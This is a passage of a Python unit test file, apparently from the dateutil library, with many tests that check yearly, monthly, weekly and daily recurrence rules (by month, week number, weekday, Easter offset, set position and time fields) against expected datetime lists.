self.assertEqual(list(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testYearlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testYearlyByWeekNo(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testYearlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may fall in the previous year.
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testYearlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testYearlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testYearlyByEaster(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testYearlyByEasterPos(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testYearlyByEasterNeg(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testYearlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testYearlyByHour(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1998, 9, 2, 6, 0),
datetime(1998, 9, 2, 18, 0)])
def testYearlyByMinute(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1998, 9, 2, 9, 6)])
def testYearlyBySecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1998, 9, 2, 9, 0, 6)])
def testYearlyByHourAndMinute(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1998, 9, 2, 6, 6)])
def testYearlyByHourAndSecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1998, 9, 2, 6, 0, 6)])
def testYearlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testYearlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testYearlyBySetPos(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonthday=15,
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 11, 15, 18, 0),
datetime(1998, 2, 15, 6, 0),
datetime(1998, 11, 15, 18, 0)])
def testMonthly(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 10, 2, 9, 0),
datetime(1997, 11, 2, 9, 0)])
def testMonthlyInterval(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 11, 2, 9, 0),
datetime(1998, 1, 2, 9, 0)])
def testMonthlyIntervalLarge(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
interval=18,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1999, 3, 2, 9, 0),
datetime(2000, 9, 2, 9, 0)])
def testMonthlyByMonth(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 2, 9, 0),
datetime(1998, 3, 2, 9, 0),
datetime(1999, 1, 2, 9, 0)])
def testMonthlyByMonthDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 10, 1, 9, 0),
datetime(1997, 10, 3, 9, 0)])
def testMonthlyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(1998, 1, 7, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testMonthlyByWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
# Third Monday of the month
self.assertEqual(rrule(MONTHLY,
byweekday=(MO(+3)),
dtstart=datetime(1997, 9, 1)).between(datetime(1997, 9, 1),
datetime(1997, 12, 1)),
[datetime(1997, 9, 15, 0, 0),
datetime(1997, 10, 20, 0, 0),
datetime(1997, 11, 17, 0, 0)])
def testMonthlyByNWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 25, 9, 0),
datetime(1997, 10, 7, 9, 0)])
def testMonthlyByNWeekDayLarge(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 10, 16, 9, 0)])
def testMonthlyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testMonthlyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 29, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testMonthlyByMonthAndNWeekDayLarge(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 15, 9, 0),
datetime(1998, 1, 20, 9, 0),
datetime(1998, 3, 12, 9, 0)])
def testMonthlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testMonthlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testMonthlyByYearDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testMonthlyByYearDayNeg(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testMonthlyByMonthAndYearDay(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testMonthlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 4, 10, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testMonthlyByWeekNo(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testMonthlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may fall in the previous year.
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testMonthlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testMonthlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testMonthlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testMonthlyByEaster(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testMonthlyByEasterPos(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testMonthlyByEasterNeg(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testMonthlyByHour(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 10, 2, 6, 0),
datetime(1997, 10, 2, 18, 0)])
def testMonthlyByMinute(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 10, 2, 9, 6)])
def testMonthlyBySecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 10, 2, 9, 0, 6)])
def testMonthlyByHourAndMinute(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 10, 2, 6, 6)])
def testMonthlyByHourAndSecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 10, 2, 6, 0, 6)])
def testMonthlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testMonthlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testMonthlyBySetPos(self):
self.assertEqual(list(rrule(MONTHLY,
count=3,
bymonthday=(13, 17),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 13, 18, 0),
datetime(1997, 9, 17, 6, 0),
datetime(1997, 10, 13, 18, 0)])
def testWeekly(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testWeeklyInterval(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 9, 30, 9, 0)])
def testWeeklyIntervalLarge(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 1, 20, 9, 0),
datetime(1998, 6, 9, 9, 0)])
def testWeeklyByMonth(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 13, 9, 0),
datetime(1998, 1, 20, 9, 0)])
def testWeeklyByMonthDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 10, 1, 9, 0),
datetime(1997, 10, 3, 9, 0)])
def testWeeklyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(1998, 1, 7, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testWeeklyByWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testWeeklyByNWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testWeeklyByMonthAndWeekDay(self):
# This test is interesting, because it crosses the year
# boundary in a weekly period to find day '1' as a
# valid recurrence.
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testWeeklyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testWeeklyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testWeeklyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testWeeklyByYearDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testWeeklyByYearDayNeg(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testWeeklyByMonthAndYearDay(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testWeeklyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testWeeklyByWeekNo(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testWeeklyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may fall in the previous year.
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testWeeklyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testWeeklyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testWeeklyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testWeeklyByEaster(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testWeeklyByEasterPos(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testWeeklyByEasterNeg(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testWeeklyByHour(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 9, 6, 0),
datetime(1997, 9, 9, 18, 0)])
def testWeeklyByMinute(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 9, 9, 6)])
def testWeeklyBySecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 9, 9, 0, 6)])
def testWeeklyByHourAndMinute(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 9, 6, 6)])
def testWeeklyByHourAndSecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 9, 6, 0, 6)])
def testWeeklyByMinuteAndSecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testWeeklyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testWeeklyBySetPos(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 4, 6, 0),
datetime(1997, 9, 9, 18, 0)])
def testDaily(self):
self.assertEqual(list(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testDailyInterval(self):
self.assertEqual(list(rrule(DAILY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 6, 9, 0)])
def testDailyIntervalLarge(self):
self.assertEqual(list(rrule(DAILY,
count=3,
interval=92,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 12, 3, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testDailyByMonth(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 2, 9, 0),
datetime(1998, 1, 3, 9, 0)])
def testDailyByMonthDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 10, 1, 9, 0),
datetime(1997, 10, 3, 9, 0)])
def testDailyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(1998, 1, 7, 9, 0),
datetime(1998, 3, 5, 9, 0)])
def testDailyByWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testDailyByNWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testDailyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testDailyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 1, 8, 9, 0)])
def testDailyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
